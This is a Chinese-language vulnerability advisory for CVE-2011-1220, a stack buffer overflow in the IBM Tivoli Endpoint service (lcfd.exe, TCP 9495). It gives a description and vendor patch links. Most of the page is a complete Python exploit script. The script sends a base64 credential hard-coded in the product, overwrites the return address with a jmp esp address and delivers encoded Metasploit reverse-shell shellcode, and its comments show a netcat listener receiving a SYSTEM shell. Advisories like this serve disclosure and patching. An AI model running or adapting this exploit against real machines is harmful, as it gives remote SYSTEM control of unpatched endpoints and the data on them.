安全研究
安全漏洞
IBM Tivoli Endpoint服务POST请求参数栈缓冲区溢出漏洞
发布日期:2011-05-31
更新日期:2011-06-07
受影响系统:
IBM Tivoli Management Framework 4.3.1描述:
IBM Tivoli Management Framework 4.1.1
IBM Tivoli Management Framework 4.1
BUGTRAQ ID: 48049
CVE ID: CVE-2011-1220
IBM Tivoli Management Framework可提供大量远程位置或设备的管理工具。
IBM Tivoli Management Framework 的终端服务在实现上存在POST参数栈缓冲区溢出漏洞,远程攻击者可利用此漏洞执行任意代码或造成拒绝服务。
IBM Tivoli Management Framework包含一个终端服务程序(lcfd.exe),运行在终端用户主机上。该服务默认监听TCP 9495端口。要访问该页,需要进行远程身份验证。但通过使用一个内置的账号,攻击者可访问受限页面。在解析用户提交的POST请求时,进程将POST变量的内容直接复制到256字节的栈缓冲区中,这可能造成缓冲区溢出。远程攻击者可利用此漏洞以SYSTEM权限执行任意代码。
<*来源:Tenable Network Security (http://www.tenablesecurity.com/)
链接:http://www.zerodayinitiative.com/advisories/ZDI-11-169/
https://www-304.ibm.com/support/docview.wss?uid=swg21499146&wv=1
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
2、
#!/usr/bin/python
# tiv-sys.py
# IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# June 2011
#
# Discovered by: Brian Adeloye of Tenable Network Security
#
# This exploit makes use of two vulnerabilities:
#
# 1) Base64 authentication credentials hard-coded in lcfd.exe
# 2) Stack-based buffer overflow when parsing HTTP variable values
#
# Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3
#
# $ python tiv-sys.py 192.168.0.188
# .....
# $ nc -v -l 4444
# Connection from 192.168.0.188 port 4444 [tcp/*] accepted
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Tivoli\lcf\dat\1>
#
# References:
#
# http://www.zerodayinitiative.com/advisories/ZDI-11-169/
# https://www-304.ibm.com/support/docview.wss?uid=swg21499146
#
import sys
import struct
import socket
import httplib
import urllib
port=9495
ret=0x7C96BF33 # jmp esp @ user32.dll
junk="B"*256
# windows/shell_reverse_tcp - 333 bytes
# http://www.metasploit.com
# Encoder: x86/countdown
# LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5,
# EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=
payload=(
"\x2b\xc9\x66\xb9\x39\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30"
"\x4c\x0e\x07\xe2\xfa\xfd\xea\x8a\x04\x05\x06\x67\x81\xec"
"\x3b\xd9\x68\x86\x5c\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65"
"\x30\x16\xad\x51\x3a\x2c\xe1\x2e\xe0\x8d\x1e\x42\x58\x27"
"\x0a\x07\xe9\xe6\x27\x2a\xeb\xcf\xde\x7d\x67\xba\x60\x23"
"\xbf\x77\x0a\x36\xe8\xb2\x7a\x43\xb9\xfd\x4a\x75\x41\x91"
"\x12\xc8\x0c\x5d\xcd\x1f\x68\x48\x99\xa8\x70\x04\xc5\x7b"
"\xdb\x50\x84\x62\xab\x64\x96\xfb\x99\x96\x57\x5a\x9b\x65"
"\xbe\x2a\x94\x62\x1f\x9b\x5f\x18\x42\x12\x8a\x31\xe1\x33"
"\x48\x6c\xbd\x09\xfb\x7d\x39\xf8\x2c\x69\x77\xa4\xf3\x7d"
"\xf1\x7a\xac\xf4\x3a\x5b\xa4\xda\xd9\xe2\xdd\xdf\xd7\x78"
"\x68\xd1\xd5\xd1\x07\x9f\x65\x09\xcd\xf9\xa1\xa1\x94\x95"
"\xfe\xe0\xeb\xab\xc5\xcf\xf4\xd1\xe9\xb9\xa7\x5e\x77\x1b"
"\x34\xa4\xa6\xa7\x81\x6d\xfe\xfb\xc4\x84\x2e\xc4\xb0\x4e"
"\x67\xe3\xe4\xe5\xe6\xf7\xe8\xf9\xea\xd3\x56\xb2\x61\x5f"
"\x3f\x14\x4b\x04\xac\x05\x6e\xc7\x0e\xa1\xc8\xcb\xdd\x91"
"\x47\x29\xba\xc1\x84\x84\xbc\x4c\x73\xa3\xb9\x26\x0f\xb3"
"\xbf\xb0\xba\xdf\x69\x02\xb5\xb4\xb3\xd4\x10\x8d\xfa\xb0"
"\xbc\x09\x11\x8b\x29\xab\xd4\xcd\xf3\xf2\x79\xb1\xd2\xe7"
"\x3e\xf9\xbe\xaf\xac\xab\xa8\xa9\x46\x57\x4c\x55\x52\x56"
"\x50\x6f\x71\xc5\x35\x8d\xf3\xd8\x87\xef\x5e\x47\x54\xec"
"\x24\x7d\x1e\x90\x05\x79\xe5\xce\xa7\xfd\x03\x35\x2a\x49"
"\x84\xb6\x99\xb8\xd9\xf2\x14\x2f\x56\x21\xac\xd6\xce\x5a"
"\x35\x8a\x75\x20\x46\x5a\x5c\x37\x6b\xc6\xef")
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" <target> [port]"
sys.exit(0)
target=sys.argv[1]
if len(sys.argv)==3:
port=int(sys.argv[2])
retaddr=struct.pack("<L",ret)
data=urllib.urlencode({"test":junk+retaddr+payload})
size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')
hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss
conn=httplib.HTTPConnection(target,port)
conn.request("POST","/addr",data,hdrs)
conn.close()
建议:
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://www-304.ibm.com/support/docview.wss?uid=swg21499146
http://www.ers.ibm.com/
浏览次数:3555
严重程度:0(网友投票)
绿盟科技给您安全的保障